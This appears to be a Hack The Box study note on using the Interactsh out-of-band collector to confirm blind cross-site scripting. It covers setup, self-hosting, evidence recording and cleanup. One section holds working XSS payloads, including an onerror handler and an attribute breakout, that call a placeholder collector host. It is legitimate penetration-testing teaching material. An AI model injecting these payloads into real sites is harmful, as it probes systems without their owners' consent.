blind-xss-tool-interactsh.md (17926B)
1 --- 2 title: "Blind XSS Tool - Interactsh" 3 description: "Interactsh generates unique out-of-band interaction domains and reports DNS, HTTP, SMTP, LDAP, and other callbacks. For blind XSS, it is a fast way to…" 4 category: web 5 tags: ["web", "xss"] 6 tools: [] 7 difficulty: intermediate 8 updated: "2026-08-10" 9 source: "vault:Web/Blind XSS Tool - Interactsh.md" 10 --- 11 # Blind XSS Tool — Interactsh `fas:ClipboardList` 12 13 ## Summary 14 15 [Interactsh](https://github.com/projectdiscovery/interactsh) generates unique out-of-band interaction domains and reports DNS, HTTP, SMTP, LDAP, and other callbacks. For blind XSS, it is a fast way to determine whether an unseen browser resolved or requested a unique address. It is lighter than XSS Hunter or ezXSS, but it does not automatically provide the same screenshots, DOM captures, or browser-specific evidence. 16 17 > [!danger]+ HTB-Only Boundary 18 > `fas:TriangleExclamation` 19 > 1. Use Interactsh only in Hack The Box, deliberately vulnerable applications, or systems you own and are explicitly authorised to test. 20 > 2. Start with callback-only probes that collect no cookies, DOM, or browser storage. 21 > 3. Public Interactsh services are third-party infrastructure; do not send sensitive lab data in callback paths. 22 > 4. See Cross-Site Scripting (XSS) - HTB Cheat Sheet for context-specific payloads and impact validation. 23 24 --- 25 26 ## Conceptual Information 27 28 ### What Interactsh Proves 29 30 | Observation | Strongest safe conclusion | What it does not prove | 31 |---|---|---| 32 | DNS callback only | A system resolved the unique hostname | Browser JavaScript execution | 33 | HTTP request for an injected image URL | A renderer parsed the resource reference and requested it | JavaScript execution | 34 | HTTP request created inside an event handler | Browser-side JavaScript executed and egress was available | Cookie access or privileged actions | 35 | Repeated callbacks | The stored value was rendered more than once | Number of distinct users without correlation evidence | 36 | No callback | Nothing reached this collector during the observation window | Absence of XSS; CSP, routing, rendering, or timing may block it | 37 38 ### Choose the Right Collector 39 40 | Need | Recommended tool | 41 |---|---| 42 | Fast unique DNS/HTTP confirmation | **Interactsh** | 43 | Screenshots, DOM, and rich browser reports | Blind XSS Tool - XSS Hunter | 44 | Flexible self-hosted payload and notification controls | Blind XSS Tool - ezXSS | 45 | Raw callback visible over the HTB VPN | Python HTTP server or Netcat from the main XSS note | 46 47 > [!info]+ Correlation Model 48 > 1. The client generates a unique domain containing a correlation identifier and nonce. 49 > 2. The server records interactions for that identifier. 50 > 3. The client polls and decrypts or displays matching events. 51 > 4. Add your own field label as a subdomain or path only when it remains within the generated unique domain structure. 52 53 --- 54 55 ## Tools Overview `fas:Screwdriver` 56 57 > [!info]+ [Interactsh Web Client](https://app.interactsh.com) Overview 58 > 1. Browser-based dashboard with no local installation. 59 > 2. Stores session state in browser storage. 60 > 3. Best for a quick, non-sensitive HTB callback test. 61 62 > [!info]+ Interactsh CLI Client Overview 63 > `fas:Terminal` 64 > 1. Generates payloads and polls for interactions in a terminal. 65 > 2. Supports session files, JSON output, custom servers, and protected-server tokens. 66 > 3. Best for reproducible lab notes and long-running polling. 67 68 > [!info]+ Interactsh Server Overview 69 > 1. Self-hosted DNS and application-protocol interaction collector. 70 > 2. Requires a dedicated domain, nameserver delegation, a public server, and careful exposure controls. 71 > 3. Best when public shared infrastructure is unsuitable or unreliable. 72 73 --- 74 75 ## Commands and Implementation 76 77 ### 1. Hosted Web Client — Fastest Start 78 79 1. Open [https://app.interactsh.com](https://app.interactsh.com). 80 2. Copy the unique generated domain. 81 3. Open `https://UNIQUE_DOMAIN/self-test` in a separate lab browser tab. 82 4. Confirm that DNS and HTTP events appear. 83 5. Keep the tab open while testing the HTB field. 84 6. Export or record the minimal callback evidence, then clear the browser session when finished. 85 86 > [!warning]+ Hosted Service Boundary 87 > `fas:TriangleExclamation` 88 > 1. Treat the generated domain as temporary. 89 > 2. Do not place cookies, tokens, DOM content, usernames, or flags in the callback URL. 90 > 3. Public server availability and default domains may change; use the CLI or self-hosting when reliability matters. 91 92 ### 2. Install the CLI with Go 93 94 The project README currently requires Go `1.20` or newer for source installation. 95 96 ```bash 97 go version 98 go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest 99 interactsh-client -version 100 ``` 101 102 > [!info]+ Command Breakdown 103 > `fas:Terminal` 104 > 1. **`go version`**: Confirm the local Go toolchain meets the project requirement. 105 > 2. **`@latest`**: Installs the current published client from the official module path. 106 > 3. Ensure the Go binary directory is in `PATH` if the final command is not found. 107 108 ### 3. Start a Persistent Client Session 109 110 ```bash 111 interactsh-client -sf interactsh-htb.session 112 [INF] Listing 1 payload for OOB Testing 113 UNIQUE_CORRELATION_ID.oast.example 114 ``` 115 116 > [!info]+ Session Breakdown 117 > 1. **`-sf interactsh-htb.session`**: Saves the client session so polling can resume after interruption. 118 > 2. The displayed hostname is unique to this session; copy it exactly. 119 > 3. Keep the session file private because it associates the client with its interactions. 120 > 4. The default public domains may rotate, so use the value printed by the client rather than a hard-coded suffix. 121 122 If the current public service requires ProjectDiscovery authentication: 123 124 ```bash 125 interactsh-client -auth 126 ``` 127 128 > [!info]+ Authentication Note 129 > 1. Follow the interactive prompt and use your own ProjectDiscovery Cloud Platform API key. 130 > 2. Do not paste API keys into command history or the Obsidian vault. 131 > 3. Public-server authentication is separate from a token used by a protected self-hosted server. 132 133 ### 4. Run the CLI Client with Docker 134 135 ```bash 136 docker run --rm -it projectdiscovery/interactsh-client:latest 137 [INF] Listing 1 payload for OOB Testing 138 UNIQUE_CORRELATION_ID.oast.example 139 ``` 140 141 > [!info]+ Docker Breakdown 142 > `fas:Terminal` 143 > 1. **`--rm`**: Removes the temporary container after exit. 144 > 2. **`-it`**: Keeps the polling client interactive. 145 > 3. Mount a dedicated directory only when you need persistent session or output files. 146 147 Persist a session file in the current directory: 148 149 ```bash 150 mkdir -p interactsh-state 151 docker run --rm -it \ 152 -v "$PWD/interactsh-state:/state" \ 153 projectdiscovery/interactsh-client:latest \ 154 -sf /state/htb.session 155 ``` 156 157 > [!warning]+ Session Storage 158 > `fas:TriangleExclamation` 159 > 1. Restrict the `interactsh-state` directory to your user. 160 > 2. Do not commit session or JSON output files. 161 > 3. Remove them after recording the required HTB evidence. 162 163 ### 5. Verify the Collector Before Injection 164 165 ```bash 166 curl -i "https://UNIQUE_DOMAIN/self-test" 167 HTTP/2 200 168 content-type: text/html; charset=utf-8 169 ``` 170 171 > [!success]+ Expected Result 172 > 1. The client reports a DNS lookup and an HTTP request for `/self-test`. 173 > 2. The event time, protocol, source address, and request metadata appear. 174 > 3. If only DNS appears, inspect TLS, routing, and HTTP service availability before planting the HTB payload. 175 176 ### 6. Create Unique HTB Correlation Labels 177 178 | Field under test | Example label | 179 |---|---| 180 | Support message | `support-message-20260808-1530` | 181 | Display name | `profile-name-20260808-1535` | 182 | `User-Agent` header | `user-agent-20260808-1540` | 183 | `Referer` header | `referer-20260808-1545` | 184 | Filename | `filename-20260808-1550` | 185 186 Use the label in the path when the generated domain format must remain unchanged: 187 188 ```text 189 https://UNIQUE_DOMAIN/support-message-20260808-1530 190 ``` 191 192 > [!tip]+ Attribution Rule 193 > `fas:Lightbulb` 194 > 1. Submit one labelled field at a time. 195 > 2. Keep a small table mapping label → request → account → time. 196 > 3. Do not include flags, usernames, or secrets in labels. 197 198 ### 7. Blind-XSS Callback Payloads 199 200 Replace `UNIQUE_DOMAIN` and the label with values from the active session. 201 202 ```html 203 <!-- Resource callback: proves HTML parsing and outbound resource loading --> 204 <img src="https://UNIQUE_DOMAIN/support-message-20260808-1530"> 205 206 <!-- Event-handler callback: proves JavaScript execution --> 207 <img src=x onerror="new Image().src='https://UNIQUE_DOMAIN/js-support-message-20260808-1530'"> 208 209 <!-- Confirmed double-quoted attribute breakout --> 210 "><img src=x onerror="new Image().src='https://UNIQUE_DOMAIN/attr-profile-name-20260808-1535'"> 211 ``` 212 213 > [!warning]+ Payload Interpretation 214 > `fas:TriangleExclamation` 215 > 1. The first payload can fire without JavaScript; report it as resource loading, not script execution. 216 > 2. The second and third callbacks originate inside an event handler and therefore support a JavaScript-execution finding. 217 > 3. CSP, sanitisation, mixed-content policy, or outbound filtering may prevent a callback even when injection exists. 218 > 4. Keep callback URLs free of cookies and other sensitive values on public infrastructure. 219 220 ### 8. Read and Record an Interaction 221 222 | Field | Interpretation | 223 |---|---| 224 | Protocol | DNS, HTTP, SMTP, LDAP, or another supported interaction | 225 | Unique ID | Connects the event to the generated payload | 226 | Remote address | Network source seen by the collector; may be a proxy or resolver | 227 | Timestamp | Helps correlate asynchronous rendering | 228 | HTTP path | Identifies the tested field label | 229 | Headers | May reveal browser, proxy, or automation context | 230 | Raw request | Evidence of the exact callback; may contain sensitive values if the payload included them | 231 232 > [!success]+ Minimum HTB Evidence 233 > 1. Screenshot or export the interaction with its unique label and timestamp. 234 > 2. Save the request that planted the payload. 235 > 3. State whether evidence was DNS-only, resource loading, or JavaScript-created HTTP. 236 > 4. Remove the stored payload and delete local session/output data after the write-up is complete. 237 238 --- 239 240 ## Optional Self-Hosting 241 242 > [!important]+ Self-Hosting Requirements 243 > `fas:TriangleExclamation` 244 > 1. A dedicated domain used only for OAST. 245 > 2. Glue or host records such as `ns1` and `ns2` pointing to the server public IP. 246 > 3. Nameserver delegation of the OAST domain to those hosts. 247 > 4. A public VPS able to bind DNS and HTTP/TLS ports. 248 > 5. A protected client token, restricted administration, monitoring, and a retention decision. 249 250 ### 9. Configure DNS Delegation 251 252 At the registrar or authoritative DNS provider: 253 254 1. Create host/glue record `ns1.oast.YOUR_DOMAIN` → `SERVER_IP`. 255 2. Create host/glue record `ns2.oast.YOUR_DOMAIN` → `SERVER_IP`. 256 3. Delegate `oast.YOUR_DOMAIN` to `ns1.oast.YOUR_DOMAIN` and `ns2.oast.YOUR_DOMAIN`. 257 4. Wait for delegation to propagate. 258 5. Verify from an independent resolver. 259 260 ```bash 261 dig NS oast.YOUR_DOMAIN +short 262 dig A ns1.oast.YOUR_DOMAIN +short 263 dig A ns2.oast.YOUR_DOMAIN +short 264 ``` 265 266 > [!success]+ Expected DNS Result 267 > 1. The delegated nameservers are returned for the OAST domain. 268 > 2. Both nameserver hosts resolve to the intended server address. 269 > 3. Do not start payload testing until delegation is consistent externally. 270 271 ### 10. Install and Start the Server 272 273 ```bash 274 go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest 275 interactsh-server -version 276 sudo interactsh-server -domain oast.YOUR_DOMAIN 277 ``` 278 279 > [!info]+ Server Breakdown 280 > `fas:Terminal` 281 > 1. **`-domain`**: Sets the dedicated delegated OAST domain. 282 > 2. The server attempts to discover public addresses and configure supported listeners. 283 > 3. Privileged ports require appropriate OS capabilities or a carefully managed service account; avoid running a long-lived service interactively as root. 284 > 4. Inspect `interactsh-server -h` on the installed version before production use because supported services and flags evolve. 285 286 Common service ports include: 287 288 | Protocol | Port | Required for browser-focused XSS? | 289 |---|---:|---| 290 | DNS | UDP/TCP `53` | Yes | 291 | HTTP | TCP `80` | Useful for redirects and plaintext labs | 292 | HTTPS | TCP `443` | Yes for secure callback reliability | 293 | SMTP/SMTPS | TCP `25`/`587` | No, unless testing mail interactions | 294 | LDAP | TCP `389` | No, unless testing LDAP interactions | 295 296 > [!warning]+ Least Exposure 297 > `fas:TriangleExclamation` 298 > 1. Expose only the protocols required for the authorised test. 299 > 2. Use the installed version's help output to disable unused listeners where supported. 300 > 3. Apply cloud and host firewall rules together. 301 > 4. Run the service under a dedicated account with only the required bind capabilities. 302 303 ### 11. Connect a Client to the Self-Hosted Server 304 305 ```bash 306 interactsh-client -server oast.YOUR_DOMAIN 307 ``` 308 309 For a protected server: 310 311 ```bash 312 interactsh-client -server oast.YOUR_DOMAIN -token SELF_HOSTED_CLIENT_TOKEN 313 ``` 314 315 > [!info]+ Client Connection 316 > 1. **`-server`**: Overrides the rotating public server list. 317 > 2. **`-token`**: Authenticates to a protected self-hosted server. 318 > 3. Store the token in a protected configuration file or secret manager rather than shell history. 319 320 ### 12. Optional Static Payload Hosting 321 322 The self-hosted server can expose files under its `/s/` path when started with an HTTP directory: 323 324 ```bash 325 interactsh-server \ 326 -domain oast.YOUR_DOMAIN \ 327 -http-directory ./lab-payloads 328 ``` 329 330 > [!warning]+ Static Hosting Boundary 331 > `fas:TriangleExclamation` 332 > 1. Host only minimal, reviewed HTB lab files. 333 > 2. Do not enable dynamic responses or arbitrary public script hosting on a domain shared with other services. 334 > 3. Keep the directory read-only to the service and review its contents before every run. 335 336 --- 337 338 ## Operations and Lifecycle 339 340 ### Logs and Session Output 341 342 ```bash 343 interactsh-client -sf interactsh-htb.session -json -o interactions.jsonl 344 ``` 345 346 > [!info]+ Output Breakdown 347 > 1. **`-json`**: Produces structured interaction records. 348 > 2. **`-o`**: Writes events to the named file. 349 > 3. Protect the session and JSONL files because request headers and callback paths may be sensitive. 350 351 ### Update 352 353 ```bash 354 go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest 355 interactsh-client -version 356 ``` 357 358 For Docker, pull the current client image before the next lab: 359 360 ```bash 361 docker pull projectdiscovery/interactsh-client:latest 362 ``` 363 364 > [!tip]+ Update Check 365 > `fas:Lightbulb` 366 > 1. Review the official release notes before updating a self-hosted server. 367 > 2. Verify client/server compatibility and complete a DNS-plus-HTTP self-test. 368 > 3. Keep the previous binary or VPS snapshot until the new version is verified. 369 370 ### Retention and Cleanup 371 372 1. Stop polling after the HTB observation window. 373 2. Export only the interaction records needed for the write-up. 374 3. Clear the hosted web client's browser storage when the session is no longer required. 375 4. Remove local session and JSONL files after evidence verification. 376 5. For self-hosting, stop the service, revoke client tokens, remove DNS delegation, and close exposed ports. 377 6. Keep no callback data beyond the lab/reporting requirement. 378 379 > [!danger]+ Self-Hosted Retirement 380 > `fas:TriangleExclamation` 381 > 1. Removing only the web service leaves delegated DNS and other listeners exposed. 382 > 2. Verify both cloud and host firewalls after shutdown. 383 > 3. Remove or repurpose the dedicated domain only after DNS caches have expired and no test payloads remain stored. 384 385 --- 386 387 ## Troubleshooting 388 389 > [!failure]+ No Interaction Appears 390 > `fas:CircleXmark` 391 > 1. Open the generated URL yourself and confirm DNS plus HTTP events. 392 > 2. Verify that the client is still polling the correct session. 393 > 3. Inspect the HTB browser Console and Network for CSP, TLS, mixed-content, or sanitisation failures. 394 > 4. Confirm the stored field is rendered by the expected user or background workflow. 395 > 5. Test a simple `<img src>` before an event-handler callback. 396 397 > [!failure]+ DNS Appears but HTTP Does Not 398 > `fas:CircleXmark` 399 > 1. Confirm the exact scheme and hostname requested by the payload. 400 > 2. Test HTTPS directly with `curl`. 401 > 3. Check server port exposure and certificate validity. 402 > 4. Remember that DNS-only evidence does not prove JavaScript execution. 403 404 > [!failure]+ Self-Hosted Domain Does Not Register 405 > `fas:CircleXmark` 406 > 1. Verify glue records and nameserver delegation from an external resolver. 407 > 2. Confirm UDP and TCP `53` reach the server. 408 > 3. Confirm no existing DNS daemon occupies port `53`. 409 > 4. Review server logs and the current version's help output. 410 411 > [!failure]+ Public Server or Authentication Error 412 > `fas:CircleXmark` 413 > 1. Run `interactsh-client -auth` if the selected public service requires a ProjectDiscovery API key. 414 > 2. Generate a fresh session rather than reusing an expired domain. 415 > 3. Try another official default server through the client's supported configuration. 416 > 4. Move to a protected self-hosted server when public availability is unsuitable. 417 418 --- 419 420 ## Lessons Learned `fas:Lightbulb` 421 422 1. DNS, resource loading, and JavaScript execution are three different evidence levels and must be reported separately. 423 2. Unique labels turn asynchronous blind callbacks into attributable findings. 424 3. Public OAST infrastructure is ideal for harmless reachability tests, not sensitive data collection. 425 4. Self-hosting improves control but adds DNS, TLS, firewall, token, logging, and retention responsibilities. 426 427 --- 428 429 ## References `fas:BookOpen` 430 431 1. [ProjectDiscovery Interactsh Repository](https://github.com/projectdiscovery/interactsh) 432 2. [Interactsh Web Client](https://app.interactsh.com) 433 3. [ProjectDiscovery Interactsh Release Article](https://projectdiscovery.io/blog/interactsh-release) 434 4. [Docker Client Image](https://hub.docker.com/r/projectdiscovery/interactsh-client) 435 5. Cross-Site Scripting (XSS) - HTB Cheat Sheet 436 6. Blind XSS Tool - XSS Hunter 437 7. Blind XSS Tool - ezXSS 438 439 #HTB #WebSecurity #XSS #BlindXSS #Interactsh #OAST